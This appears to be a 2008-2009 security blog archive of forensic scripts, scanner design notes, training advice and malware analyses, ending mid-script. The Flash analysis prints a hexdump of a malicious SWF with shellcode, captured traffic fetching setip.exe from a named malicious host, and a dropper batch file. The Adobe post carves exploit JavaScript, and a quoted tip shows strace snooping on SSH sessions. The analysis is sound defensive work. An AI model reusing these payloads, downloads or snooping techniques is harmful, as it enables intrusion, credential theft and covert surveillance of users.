$ rm *.ex_
$ ls
c1.bin Carved_decoded_ROTXOR255_key0_step-1.exe multi-xor-v2.pl

Quick shell script to extract the contents of an image

2009-10-18T17:59:00.003-04:00

- assuming TSK is installed, the image "image.dd" is in the local directory, and a directory "files" exists for the extracts. Change the offset and disk type to suit. This particular image was a 1GB FAT16 USB drive image.

# for i in `fls -Dr -m / -f fat -o 63 image.dd | grep -v ".Trash" | grep -v "(deleted)" | cut -f 2 -d"|"`; do mkdir files/$i; done

# for i in `fls -Fr -m / -f fat -o 63 image.dd | grep -v ".Trash" | grep -v "(deleted)" | cut -d "|" -f 2,4`; do echo $i; icat -o 63 -f fat image.dd `echo $i | cut -d "|" -f 2` > files/`echo $i | cut -d "|" -f 1`; done

Idea for enterprise scanning

2009-05-04T00:24:00.007-04:00

Pseudocode for an internal scanner. Attempts to combat environmental manipulation through self-integrity checking, but a better mechanism may be needed.

Assumed this operates in a client/server model with the server offering messages to clients in a one-to-many or several-to-many relationship. Ulitmately, the server should be able to post a request (hash list, updated files) and the clients should pull the list, self check, perform the tests, and report back. The central system should them be able to generate reports based on the results.

INteresting reports might include which scanned successfully, which didn't report, any anomalies discovered. All hashes are passed back to central, so the tool could be used for forensic anomalies, known discovery of artifacts, discovery of similar artifacts within a defined threshhold, or compliance applications (similarity or direct matching). The insider threat model could be integrated by allowing the tracking of defined critical documents within reporting systems.

Client structure follows:

internal scanner

pull updates and signatures. check sig, decode to mem, load hashes

provide non-DOM driver to access disk filesystem - driver client bindings
provide access to memory - Volatility

check self integrity of all components, static files
Walk VAD and dump all processes/dll injects to disk
identify self in proc dump and validate hash vice known

dump registry hives in memory
extract registry values for known hostiles - regripper

for each proc/file
perform static hash scanning >> hashfile
perform context piecewise hashing >> cphfile

compile xml/soap response
encrypt, sign, report back to central

Needed tools:

http://code.google.com/p/pyssdeep/
http://www.py2exe.org/
https://www.volatilesystems.com/default/volatility
http://www.regripper.net/
http://ssdeep.sourceforge.net/
http://www.indigostar.com/perl2exe.htm

Opinion on SMTP Honeypots

2009-05-01T09:58:00.001-04:00

honeyd is an infrastructure honeypot that refers to other services. it's a little heavy. If you are trying to emulate the Interweb on an open access point for research, it's great. For this, you want something more focused, either a honeytrapd type of service (dangerous on your border) or a full-time script running in its own process(s) to capture and handle load. Look at truman's (http://www.secureworks.com/research/tools/truman.html) smtp script and consider reversing it's interally-focused intent to external. Add some support scripts for housekeeping and you should be good to go. Obviously, run in a dmz, with limited perms, on a box that is easily rebuilt and doesn't have other dependent, critical apps/processes. VM should be fine.

On Tue, Apr 28, 2009 at 12:28 PM, private investigation <xxx> wrote:
I tried to use honeyd but seems that honeyd cannot handle much of smtp request

So You Thought You Were in Control of Your Friend List

2009-05-01T09:38:00.003-04:00

Check this tool out! Facebook Controller:

http://my.opera.com/quakerdoomer/blog/2009/04/30/fbcontroller-facebook-controller-the-ultimate-facebook-controller-without-the-pa

Nice, using social media against you to subvert authentication controls, do recon, and manipulate data. Great POC!

SSH Command Monitoring

2009-05-01T09:36:00.001-04:00

This was an interesting post from the secureshell list. Thanks Richard!

Hi "J",

you can do that with your unix/linux onboard tools. just attach strace
to the sshd process of the user you want to monitor:

strace -s 4096 -e trace=read -p PROCESS_ID

than have a look for the shell prompt (e.g.):

read(10, "\33]0;USERNAME@HOSTNAME:~\7".

.., 16384) = 22

now you know that the FD (file handle) is 10 for the users ssh session terminal.

then you can do something like that:

strace -s 4096 -e trace=read -p 10417 2>&1 | grep -E '^read\(10,' |
grep -oE '".+"'

and you should get an output like:

"uname -a"
"\r\n"
"Linux HOSTNAME 2.6.29.1 #1 SMP Sat Apr 18 11:22:05 CEST 2009 i686
Intel(R) Core(TM)2 Duo CPU L7500 @ 1.60GHz GenuineIntel GNU/Linux\r\n"
"\33]0;USERNAME@HOSTNAME:~\7"

well, this will only work if you have root permission on the server
running sshd.

have fun,
richard

Open Source Security Information Manager - OSSIM

2009-04-18T13:11:00.000-04:00

I've been playing with OSSIM (http://www.ossim.net) for the last week. The stand-alone installation from AlienVault was trivially easy, thanks guys! I was able to install a main 'trusted net' stand-alone and integrate a DMZ sub-sensor in an hour. The dashboard is pretty, with many reporting features and does a decent job of aggregating the infeed of data from the wide collection of tools it provides.

But...

Having put this Unified Threat Management (http://en.wikipedia.org/wiki/Unified_Threat_Management) device on the network, I find it to be the least secure thing out there. While AlienVault did an excellent job of bringing all of these wonderful security monitoring tools together, having the production interface on the main network acting as both collector, sensor, and admin access is a bad idea. It also uses so many products and services that it is terribly insecure itself. Having the main sensor in the trusted network isn't too bad for this, but having one of these in the more exposed DMZ makes me wary. OSSIM needs a lot of custom configuration to implement restricted access, split the collection interface to a promiscuous-only and have a separate admin interface. This can be done with taps to ensure only one-way traffic occurs, but that still leaves the service open to injection if one were to expect the box to be there. In all, the UTM sensor-with-everything idea needs to be rethought.

It's been fun to play with, but ultimately I'm going to explore running with some functionalized implementations that might prove more secure.

Suggestions for Security Training

2009-03-03T11:06:00.004-05:00

I respond to questions from time to time about a recommend security training pipeline for SOC operators at all levels. Here is the general recommendation I've developed.

(Jr Sec Analyst) Year 1 goals
- Security +
- GCIH

(Sr Sec Analyst) Year 2 goals
- begin CISSP study (reading, not a bootcamp yet)
- GCFA if doing investigations
- or GCIA if focused more on network management of IPS

(Sec Engineer/ Sr Sec Analyst, Principal) Year 3 goals
- CISSP course and testing
- GREM if moving toward malware investigation
- OR GPEN if moving toward software assurance (recommend GCIA prereq)
- begin local research projects and security defense-in-depth expansion through pilots

(Sec Architect) Year 4 goals
- CISSP/ISSEP certification
- additional SANS courses
- demonstrated local research and expansion projects

I choose to emphasize the CISSP over other equivalent certifications (CISA /CISM) becuase of its better ROI in the DOD8570.01M requirements structure. Any employee you are going to have in government service that you plan to invest in for more than a year, you should pursue this certification to maintain compliance and competitiveness. Not that it gets you knowledge without having equivalent experience, but it's a marker you have to have.

I have also chosen to emphasize SANS training as they are considered an industry gold-standard, are vendor neutral, and teach underlying concepts in addition to applied practices. Their courses are not a college degree or an 'academic' environment, but it is good training for directly applicable skills.

I think Rob Fuller has an interesting perspective at his Room362 blog entry on security credentials.

Deobfuscating the Adobe 0-day

2009-02-25T22:11:00.000-05:00

The folloiwng is a quick writeup of an analysis started on a PDF sample for the Adobe7/9 0-day. The exploit starts with an overflow, then attempts to run the javascript to drop a file c:/adobe.exe and execute it.

hexdump -C file.pdf > HEXDUMP_file.pdf.txt
less HEXDUMP_file.pdf.txt
[find the javascript near the end]

0x80301 - 525057 start of javascript exploit
0x821c8 - 532936 end of javascript exploit
=======
7879 - difference in decimal

Carve the javascript out.
dd if=file.pdf of=file.pdf.js.carve bs=1 skip=525086 count=7849

Add some stubs to cover for lack of spidermonkey functions. Not quite there, but gives the idea.

function document(){
this.write=printit;
}

var document=new document();

function address(){
this.length=0;
this.substring="";
}
var address=new address();
function nop(){
this.substring="";
}
var nop=new nop();
function jmp(){
this.length=0;
}
var jmp=new jmp();
function pointers(){
this.length=0;
this.substring="";
}
var pointers=new pointers();
function pointers1(){
this.length=0;
}
var pointers1=new pointers1();

Run and see if it prints the deobfuscated output.

./js 1.js
bt collectedfiles # ../scripts/js.sh 1.js
var address = unescape(r)
var jmp = unescape(r)
var nop = unescape(r)
var nop1 = unescape(r)
var shellcode = unescape(r)
1.js:84: TypeError: nop.substring is not a function

Only a few lines before a function missing. No luck this time, but its close. Keep playing.

USB as a Threat Vector

2008-07-13T19:51:00.001-04:00

Over the past weeks I have monitored several incidences per week of clients bringing in infected USB media and hard drives. It seems that the USB-aware malware is increasing and becoming a more common feature of Internet-delivered maladies. This allows the malware access to infect machines laterally within an organization, as well as directly from the Internet.

Script to identify domains and IP addresses by ASN and CC

2008-07-02T19:13:00.002-04:00

I wrote this more than a year ago and it has been tested pretty well. Figured since Jim over at ISC has released a similar tool, it's time to publish mine.

Usage:
# cat > queries.txt
domain1
domain2
ip3
domain4
ip5
...
^C
# perl finger.pl queries.txt

###### finger.pl ######

#This work is licensed under the Creative Commons Attribution-Share Alike 3.0 United States License. To view a copy of this license, visit http://creativecommons.org/licenses/by-sa/3.0/us/ or send a letter to Creative Commons, 171 Second Street, Suite 300, San Francisco, California, 94105, USA.

if (-e "$ARGV[0]") {
open (IFILE, "$ARGV[0]");
while () {
chomp;
undef $ipaddr; undef @whois_results; undef @resolve_results; undef $domainname; undef $a; undef @results; undef @resultr;
if (/^\s*$/) {
next;
} elsif (/^\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*$/) {
$ipaddr = $_;
@whois_results = &whois($ipaddr);
foreach $a (@whois_results) {
print "$a\n";
}
} elsif (/.+?\...?$/) {
$domainname = $_;
@resolve_results = &resolve($domainname);
foreach $a (@resolve_results) {
print "$a\n";
}
} elsif (/.+?\....?$/) {
$domainname = $_;
@resolve_results = &resolve($domainname);
foreach $a (@resolve_results) {
print "$a\n";
}
} elsif (/.+?\.....?$/) {
$domainname = $_;
@resolve_results = &resolve($domainname);
foreach $a (@resolve_results) {
print "$a\n";
}

} else { print "BAD INPUT LINE: $_\n"; }
}
} elsif ($ARGV[0] =~ /^\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*$/) {
$ipaddr = $ARGV[0];
@whois_results = &resolve($ipaddr);
# @whois_results = &whois($ipaddr);
foreach $a (@whois_results) {
print "$a\n";
}
} elsif ($ARGV[0] =~ /.+?\...?$/) {
$domainname = $ARGV[0];
@resolve_results = &resolve($domainname);
foreach $a (@resolve_results) {
print "$a\n";
}
} elsif ($ARGV[0] =~ /.+?\....?$/) {
$domainname = $ARGV[0];
@resolve_results = &resolve($domainname);
foreach $a (@resolve_results) {
print "$a\n";
}
} elsif ($ARGV[0] =~ /.+?\.....?$/) {
$domainname = $ARGV[0];
@resolve_results = &resolve($domainname);
foreach $a (@resolve_results) {
print "$a\n";
}

} else { print "BAD INPUT: $ARGV[0]\n"; }

sub resolve {
undef $domain; undef @answersr; undef $answerr; undef @reresolve; undef @resultr; undef $infor;
my $domain = shift;
if ($domain =~ /^\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*$/) {
my @answersr = `dig +short -x $domain`;
@resultr;
foreach my $answerr (@answersr) {
my @whois_resultr = &whois($domain);
foreach my $whois_answerr (@whois_resultr) {
if ($answerr =~ /^\s*$/) {
$infor = join(' | ', "NO RDNS", $whois_answerr);
} else {
$infor = join(' | ', substr($answerr,0,$answerr-1), $whois_answerr);
}
@resultr = (@resultr,$infor);
}
}
return @resultr;
# } elsif ($domain =~ /.+?\.....?\.?$/) {
} else {
my @answersr = `dig +short $domain`;
chomp(@answersr);
@resultr;
foreach my $answerr (@answersr) {
if ($answerr =~ /^\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*$/) {
my @whois_resultr = &whois($answerr);
foreach my $whois_answerr (@whois_resultr) {
$infor = join(' | ', $domain, $whois_answerr);
@resultr = (@resultr,$infor);
}
# } elsif ($answerr =~ /.+?\.....?\.$/) {
} else {
my @reresolve = &resolve(substr($answerr,0,$answerr-1));
foreach $reresolve (@reresolve) {
@resultr = (@resultr,$reresolve);
}
# } else { print "COULD NOT RESOLVE: $domain\n"; }
}
}
return @resultr;
# } else {
# print "BAD DOMAIN: $domain\n";
# return("$domain \| UNKNOWN");
}
}

sub whois {
undef $octet1; undef $octet2; undef $octet3; undef $octet4;
undef @answers; undef @results;

my $ip = shift;
if ($ip =~ /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/) {
my $octet1 = $1;
my $octet2 = $2;
my $octet3 = $3;
my $octet4 = $4;

# Perform the IP WHOIS lookup and parse the result
my @answers = `dig +short -t TXT $octet4\.$octet3\.$octet2\.$octet1\.origin\.asn\.cymru\.com`;
chomp(@answers);
foreach my $answer (@answers) {
undef @afields;
undef $ip_as; undef $ip_netblock; undef $ip_cc; undef $ip_as_source; undef $ip_as_date;
undef $as_num; undef $as_cc; undef $as_source; undef $as_date; undef $as_desc;
undef $info;

$answer =~ s/\t//g;
$answer =~ s/\"//g;
$answer =~ s/\s\|\s/\|/g;
my @afields = (split/\|/,$answer);
my $ip_as = $afields[0];
my $ip_netblock = $afields[1];
my $ip_cc = $afields[2];
my $ip_as_source = $afields[3];
my $ip_as_date = $afields[4];

# Perform the AS WHOIS lookup and parse the result
$answer = `dig +short -t TXT AS$ip_as\.asn\.cymru\.com`;
chomp($answer);
$answer =~ s/\t//g;
$answer =~ s/\"//g;
$answer =~ s/\s\|\s/\|/g;
my @afields = (split/\|/,$answer);
my $as_num = $afields[0];
my $as_cc = $afields[1];
my $as_source = $afields[2];
my $as_date = $afields[3];
my $as_desc = $afields[4];

my $info = join(' | ',sprintf("%15.15s",$ip),sprintf("%18.18s",$ip_netblock),sprintf("%2.2s",$ip_cc),sprintf("%5.5s",$ip_as),$as_desc);
@results = (@results,$info);
}

return(@results);
} else {
print "BAD IP ADDRESS: $ip\n";
return("$ip \| UNKNOWN");
}

}

Malicious Flash Badness

2008-05-28T00:16:00.001-04:00

This started after reading the first entry of this SANS story: http://isc.sans.org/diary.html?storyid=4468

Tooled with the dropper, did a little Flash version research and discovered this link worked out:

www_play0nlnie_com/pcd/topics/ff11us/20080311cPxl31/WIN%209,0,115,0ie.swf

FLARE/FLASM scream about overflow of tags.

bt collectedfiles # cat
__20080527-1113_www_play0nlnie_com_pcd_topics_ff11us_20080311cPxl31_WIN_9_0_115_0ie_flr
movie 'WIN 9,0,115,0ie.swf' {
// flash 9, total frames: 771, frame rate: 12 fps, 550x400 px

// unknown tag 86 length 40

// unknown tag 86 length 12

// unknown tag 82 length 383

// unknown tag 76 length 25
}

SWF hex

bt collectedfiles # hexdump -C
__20080527-1342_www_play0nlnie_com_pcd_topics_ff11us_20080311cPxl31_WIN_9_0_115_0ie_swf
00000000 46 57 53 09 0a 06 00 00 78 00 05 5f 00 00 0f a0 |FWS.....x.._....|
00000010 00 00 0c 03 03 44 11 08 00 00 00 bf 01 00 04 00 |.....D..........|
00000020 00 aa 02 34 d1 f5 25 13 ed 2b 45 e9 a8 90 9b 67 |...4..%..+E....g|
00000030 65 1d aa d1 5a b0 ec 91 05 6f 6b 7e 4f 9a 2a 62 |e...Z....ok~O.*b|
00000040 06 f4 a0 6d a4 3b ca c9 15 2e a8 e6 e6 40 ca 36 |...m.;.......@.6|
00000050 2d 4a ab dd 70 01 fe 25 78 ed b9 a3 54 30 f4 f1 |-J..p..%x...T0..|
00000060 cf d2 f2 e3 e1 63 e6 85 34 35 45 77 33 e4 3d 4b |.....c..45Ew3.=K|
00000070 72 10 af 86 45 59 a3 f8 c1 27 29 75 ae 34 28 2b |r...EY...')u.4(+|
00000080 7c e5 7d a7 57 7c ee c8 e6 0c d0 91 4c df f4 41 ||.}.W|......L..A|
00000090 04 27 a8 94 9a 18 e4 0e 7d 63 02 b3 bf 22 76 12 |.'......}c..."v.|
000000a0 1d 24 02 10 a6 3d 5d 3e 4c 73 ab bf b6 c2 d7 88 |.$...=]>Ls......|
000000b0 af bd ab 68 75 cc b2 b9 4d 5c b5 30 ae a5 f5 82 |...hu...M\.0....|
000000c0 42 74 69 03 37 8e 94 e2 87 22 d3 9e bc 57 2d 64 |Bti.7...."...W-d|
000000d0 cc 76 f3 72 9e 3c 5d a4 58 c1 d5 53 64 a0 a4 a8 |.v.r.<].X..Sd...|
000000e0 84 32 c0 7d b4 91 d8 8a c2 3f 70 5e e6 17 24 60 |.2.}.....?p^..$`|
000000f0 eb 16 5b 33 c9 66 b8 d8 15 66 31 04 4b 41 40 66 |..[3.f...f1.KA@f|
00000100 81 f9 63 01 7c f3 eb 05 e8 e5 ff ff ff 31 70 db |..c.|........1p.|
00000110 15 da 4a b1 25 85 71 56 14 55 8d 77 15 e0 15 6a |..J.%.qV.U.w...j|
00000120 55 ee 9e 93 09 49 9e 8d 1d 6d e2 66 f9 e8 17 e9 |U....I...m.f....|
00000130 15 6f ce 9e 12 2b 53 c9 dc bc 4b bc 7f f9 4c 19 |.o...+S...K...L.|
00000140 fb f3 15 f3 f7 0d 55 75 2d 35 60 0d 9c be 25 93 |......Uu-5`...%.|
00000150 17 a3 fd 65 14 fc 15 1f ec 94 14 a6 7d 6f 78 01 |...e........}ox.|
00000160 16 6a 63 71 7a 69 42 8e 10 ee 06 06 16 08 83 e1 |.jcqziB.........|
00000170 a8 0b 16 0b 7e 31 56 0d 16 64 e9 65 e9 2e cd 3d |....~1V..d.e...=|
00000180 32 42 46 47 e9 42 36 9e d2 7e e9 e8 e9 e7 7e e6 |2BFG.B6..~....~.|
00000190 e9 e5 e9 4f 46 e3 40 01 5e 6b 15 e0 40 30 7c 11 |...OF.@.^k..@0|.|
000001a0 4f 46 9d 3a 9b 8f 16 21 16 26 9d bc be 28 16 29 |OF.:...!.&...(.)|
000001b0 9d d7 40 c2 f6 2c 16 2d 48 dd b3 71 9d 4e 32 d9 |..@..,.-H..q.N2.|
000001c0 33 33 16 33 7c 2e 7c 38 7c 36 9d f2 15 3c 8a ff |33.3|.|8|6...<..|
000001d0 11 52 51 90 d0 3b d5 b6 68 16 fe 35 17 40 16 2b |.RQ..;..h..5.@.+|
000001e0 2b 28 20 29 31 cf d3 46 12 da d0 40 7e 0f bd 8f |+( )1..F...@~...|
000001f0 11 89 9d 35 0e a4 f9 4d 16 4e 7e 27 1e 5a 16 39 |...5...M.N~'.Z.9|
00000200 7e 5a 1c 53 7e 01 9d b9 7c dd 12 cb bd 6b d6 09 |~Z.S~...|....k..|
00000210 46 30 e9 d0 12 c0 bc d0 a8 6d 17 5f 16 37 7e 9e |F0.......m._.7~.|
00000220 16 62 16 9c 40 60 15 a2 d1 66 79 15 6c 46 d1 29 |.b..@`...fy.lF.)|
00000230 12 0f 6e 0e 16 3b e9 3b 1e 5d cd 3c 45 27 9b 37 |..n..;.;.].<E'.7|
00000240 22 22 45 8c 40 58 25 b5 9d 8a 7c 65 4f d3 f4 84 |""E.@X%...|eO...|
00000250 70 bd 52 5f 2a 7d 17 f6 ea f3 51 6f 47 d7 46 d0 |p.R_*}....QoG.F.|
00000260 47 d3 47 d2 47 d5 9b 13 25 87 16 87 44 d9 e9 df |G.G.G...%...D...|
00000270 1a 0b d2 df 14 8c 16 ec e9 ff fa 4d 12 90 9d c7 |...........M....|
00000280 26 d3 4d c1 15 75 15 74 15 77 15 76 95 74 12 c3 |&.M..u.t.w.v.t..|
00000290 45 11 cc 79 e1 ce e9 7d fe 85 e9 60 e9 ca 3f f9 |E..y...}...`..?.|
000002a0 20 2f 42 87 12 69 38 67 36 a6 7c 97 4e 12 16 aa | /B..i8g6.|.N...|
000002b0 e8 d5 e9 b9 d4 8c 16 c7 24 f6 ac af 15 4e 69 4e |........$....NiN|
000002c0 04 70 32 b3 ae 44 16 b5 16 80 9b e3 32 bc db 97 |.p2..D......2...|
000002d0 d4 ae 16 03 03 bd 16 bd fd bb ae a0 17 c0 16 7b |...............{|
000002e0 16 c1 e8 bc e9 d6 d4 d1 16 94 42 ad 12 a2 36 9e |..........B...6.|
000002f0 e9 9c 02 91 d5 9d 9d 88 2a 8b 9d 93 3e af 5b d2 |........*...>.[.|
00000300 cb 59 05 d0 c3 e7 df 9c 57 5d 12 5d 9b 9c 3e db |.Y......W].]..>.|
00000310 76 e9 df d4 a8 cc 2c 0b 62 d6 d7 16 11 e3 dc a1 |v.....,.b.......|
00000320 fd 13 2f ec 77 91 f7 6e 55 f6 15 22 9d ec 9e 42 |../.w..nU.."...B|
00000330 4f 29 47 bd 9d 99 2a 66 62 c0 6e ec e3 a6 9d 87 |O)G...*fb.n.....|
00000340 36 f1 e3 c0 df bd 57 58 15 33 25 2c 19 46 06 c3 |6.....WX.3%,.F..|
00000350 c0 8e 1e 3a dd fb 15 27 56 15 e7 c4 09 75 f0 5f |...:...'V....u._|
00000360 9c 5c 33 00 ca 62 9c 09 5c 8d 49 1b 14 d5 9c 0d |.\3..b..\.I.....|
00000370 9c 09 d2 a0 49 55 d4 e5 81 f3 e8 f0 25 64 86 1d |....IU......%d..|
00000380 2e f0 6a 90 6e 2d f1 8d cd 5e 6c 2a 6e 97 db 79 |..j.n-...^l*n..y|
00000390 09 be 73 f4 e7 54 6c 20 8e f4 87 a2 9e 6e ad 3e |..s..Tl .....n.>|
000003a0 e6 6f 32 f6 5a a5 27 34 97 f0 b8 bd 17 28 17 29 |.o2.Z.'4.....(.)|
000003b0 7f 5e 63 5b 2d 03 38 5a 60 59 39 5f 7b 51 6e 01 |.^c[-.8Z`Y9_{Qn.|
000003c0 79 5e 79 5a 72 1a 74 5a 7a 19 76 4f 39 5d 6f 5c |y^yZr.tZz.vO9]o\|
000003d0 17 15 f5 78 4e 13 19 59 6c 18 01 6f 21 ed a7 13 |...xN..Yl..o!...|
000003e0 db 97 bf a1 52 c6 f7 18 c2 ee c1 7e bc 24 43 64 |....R......~.$Cd|
000003f0 bb 2e 44 f8 f7 5d 1d f6 23 28 10 fa 0b 11 91 ec |..D..]..#(......|
00000400 d1 50 dc a4 aa 66 5e e6 df e3 d3 5e 82 a8 30 42 |.P...f^....^..0B|
00000410 00 68 94 36 9a a4 f8 24 e2 78 d1 15 c0 5f cd ce |.h.6...$.x..._..|
00000420 2c a8 15 99 b4 8e a0 08 20 20 20 20 20 20 20 20 |,....... |
00000430 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 | |
00000440 20 20 20 20 20 20 20 20 20 20 43 43 02 ff ff ff | CC....|
00000450 bf 15 0c 00 00 00 01 00 e5 9c ba e6 99 af 20 31 |.............. 1|
00000460 00 00 bf 14 7f 01 00 00 01 00 00 00 00 10 00 2e |................|
00000470 00 00 00 00 10 07 6e 65 77 5f 66 6c 61 0c 4d 61 |......new_fla.Ma|
00000480 69 6e 54 69 6d 65 6c 69 6e 65 0d 66 6c 61 73 68 |inTimeline.flash|
00000490 2e 64 69 73 70 6c 61 79 09 4d 6f 76 69 65 43 6c |.display.MovieCl|
000004a0 69 70 14 6e 65 77 5f 66 6c 61 3a 4d 61 69 6e 54 |ip.new_fla:MainT|
000004b0 69 6d 65 6c 69 6e 65 06 66 72 61 6d 65 31 00 0e |imeline.frame1..|
000004c0 61 64 64 46 72 61 6d 65 53 63 72 69 70 74 06 4f |addFrameScript.O|
000004d0 62 6a 65 63 74 0c 66 6c 61 73 68 2e 65 76 65 6e |bject.flash.even|
000004e0 74 73 0f 45 76 65 6e 74 44 69 73 70 61 74 63 68 |ts.EventDispatch|
000004f0 65 72 0d 44 69 73 70 6c 61 79 4f 62 6a 65 63 74 |er.DisplayObject|
00000500 11 49 6e 74 65 72 61 63 74 69 76 65 4f 62 6a 65 |.InteractiveObje|
00000510 63 74 16 44 69 73 70 6c 61 79 4f 62 6a 65 63 74 |ct.DisplayObject|
00000520 43 6f 6e 74 61 69 6e 65 72 06 53 70 72 69 74 65 |Container.Sprite|
00000530 07 16 01 16 03 18 05 17 01 16 07 16 0a 00 0b 07 |................|
00000540 01 02 07 02 04 07 04 06 07 05 08 07 05 09 07 06 |................|
00000550 0b 07 02 0c 07 02 0d 07 02 0e 07 02 0f 04 00 00 |................|
00000560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 |................|
00000570 01 02 08 03 00 02 01 03 01 00 01 00 00 01 03 01 |................|
00000580 01 04 01 00 04 00 01 01 09 0a 03 d0 30 47 00 00 |............0G..|
00000590 01 02 01 0a 0b 09 f8 62 8f ff ff 02 02 02 47 00 |.......b......G.|
000005a0 00 02 03 01 0a 0b 0f d0 30 d0 49 00 5d 04 24 00 |........0.I.].$.|
000005b0 60 03 4f 04 02 47 00 00 03 02 01 01 09 27 f8 62 |`.O..G.......'.b|
000005c0 79 f8 62 75 f8 e8 25 fb ff ff 00 f8 29 02 f8 63 |y.bu..%.....)..c|
000005d0 79 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 |y...............|
000005e0 02 02 02 02 47 00 00 3f 13 19 00 00 00 01 00 00 |....G..?........|
000005f0 00 6e 65 77 5f 66 6c 61 2e 4d 61 69 6e 54 69 6d |.new_fla.MainTim|
00000600 65 6c 69 6e 65 00 40 00 00 00 |eline.@...|
0000060a

ISC handler Adrien de Beaupre got the drop calls out. Collecting these, I was able to determine the following:

ax.exe

DNS queries to 'www_1ive_net'. Resolves 82.98.86.169.

0040 ed 90 47 45 54 20 2f 63 6f 75 6e 74 2f 6e 65 77 ..GET /count/new
0050 73 2e 61 73 70 20 48 54 54 50 2f 31 2e 30 0d 0a s.asp HTTP/1.0..
0060 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 48 6f 73 Accept: */*..Hos
0070 74 3a 20 77 77 77 2e 31 69 76 65 2e 6e 65 74 0d t: www.1ive.net.
0080 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a .User-Agent: Moz
0090 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 74 illa/4.0 (compat
00a0 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b 20 ible; MSIE 6.0;
00b0 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 30 29 0d Windows NT 5.0).
00c0 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 .Accept-Encoding
00d0 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 0d : gzip, deflate.
00e0 0a 0d 0a ...

Looks like a tracker. The rest of the return looks like click generation (click fraud).

Drops %system%\disk.dll and test.bat to clean up the retrieved swf.

bt brak # cat WINE_COMPARISON_ax.exe.txt_collection/test.bat
:ha
del "Z:\mnt\sda1\collections\20080527-swf\brak\ax.exe"
if exist "Z:\mnt\sda1\collections\20080527-swf\brak\ax.exe" goto ha
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.swf"
del %0

Then resolves 'www_play0nlnie_com' to 125.46.104.172 and pulls setip.exe

179 223.948001 192.168.10.22 -> 125.46.104.172 HTTP GET /setip.exe HTTP/1.0

0000 00 02 b3 a1 8d 6f 00 0c 29 fb a3 48 08 00 45 00 .....o..)..H..E.
0010 00 d6 fd ee 40 00 40 06 8b 9a c0 a8 0a 16 7d 2e ....@.@.......}.
0020 68 ac e2 a1 00 50 9b 1a 84 60 ac 79 fe fe 80 18 h....P...`.y....
0030 01 6d 5e 31 00 00 01 01 08 0a df 2a 79 b7 1a 5b .m¹.......*y..[
0040 b4 7a 47 45 54 20 2f 73 65 74 69 70 2e 65 78 65 .zGET /setip.exe
0050 20 48 54 54 50 2f 31 2e 30 0d 0a 41 63 63 65 70 HTTP/1.0..Accep
0060 74 3a 20 2a 2f 2a 0d 0a 48 6f 73 74 3a 20 77 77 t: */*..Host: ww
0070 77 2e 70 6c 61 79 30 6e 6c 6e 69 65 2e 63 6f 6d w.play0nlnie.com
0080 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f ..User-Agent: Mo
0090 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 zilla/4.0 (compa
00a0 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b tible; MSIE 6.0;
00b0 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 30 29 Windows NT 5.0)
00c0 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..Accept-Encodin
00d0 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
00e0 0d 0a 0d 0a ....

Attempts to drop a keylogger, but fails in WINE.

fixme:reg:RegRestoreKeyW (0x50,L"c:\\windows\\temp\\xTemp.sys",8): stub

Drops %system%\smart.dll and sets for start

< [Software\\Cn91x\\Fly] 1211905209
< "DllName"="smart.dll"
< "Shutdown"="DoStartup"
< "Startup"="DoShutdown"

Injects into explorer.exe and iexplore.exe.

So, sum game is backchannel, keylogger, infostealer.gamepass RK. Nice... Similar to last two weeks' SQL injections....

0x0080: 0000 003f 4761 6d65 5573 6572 3d00 020a ...?GameUser=...
0x0090: 0000 0026 4761 6d65 5061 7373 3d00 e516 ...&GamePass=...

Watch for these IPs and domains

www.play0nlnie.com | 125.46.104.172 | 125.40.0.0/13 | CN | 4837 | CHINA169-BACKBONE CNCGROUP China169 Backbone
www.1ive.com | 82.98.86.169 | 82.98.64.0/18 | DE | 12306 | Plus.Line AG IP-Services

Watch for these files

08.swf 201 52d170bd4e7b2c3b7b2276dc4e38cb3f
test.bat 214 83d3d1f07c0e93d985785e0e50bb2280
org.bat 171 6d1c59a28c01e9c77fe75b01090aa9b6
setip.exe 66560 91467a37bc29d35c36e6d054e4d03cc5
disk.dll 484352 c063edc2d2e88f331faddc030137d89c
ax.exe 19456 94237921f585b9926a4d37bd43a4b101
WIN%209,0,115,0ie.swf 1546 4f5f1f3986a302c7c4a5d15a190e9d69
07.swf 200 1dc543c3b15afb0c4d7e416126ac6356
smart.dll 35840 1a2936ad26bd7c497e106745e672884f
07.jpg 1339 5da0fcfd8b8a6fecdebf7441be99416f
news.asp 52901 fd49617f408041e89b3165c92f7c88b5

Automated Shellcode Analysis

2008-04-20T09:05:00.001-04:00

Working with Lenny Zeltser in his SANS Malware Analysis course, I was able to cobble together a script to automate shellcode analysis preparation. The analysis involves wrapping the shellcode in a shell function, then compiling it into a small program. There are several ways to do this, including using an empty C main function (Lenny) and injecting the shellcode into a husk executable (iDefense). I didn't want to use the injection method since it falls prey to two problems. 1) The husk is always the same size, only the shellcode changes (might be good for diff comparisons). I wanted something smaller. 2) The shellcode must fit into the blank space in the husk, which opens it up to possible overflow attack or, at least, shellcode size limitation. Compiling yourself avoids this problem.

Here's the script I hacked together. With a little work, I plan to put it to a CGI frontend with a return of the disassembled output.

Shellcode Analysis Script

bt shellcodetest # cat shellcode_analyzer.sh
#!/bin/sh
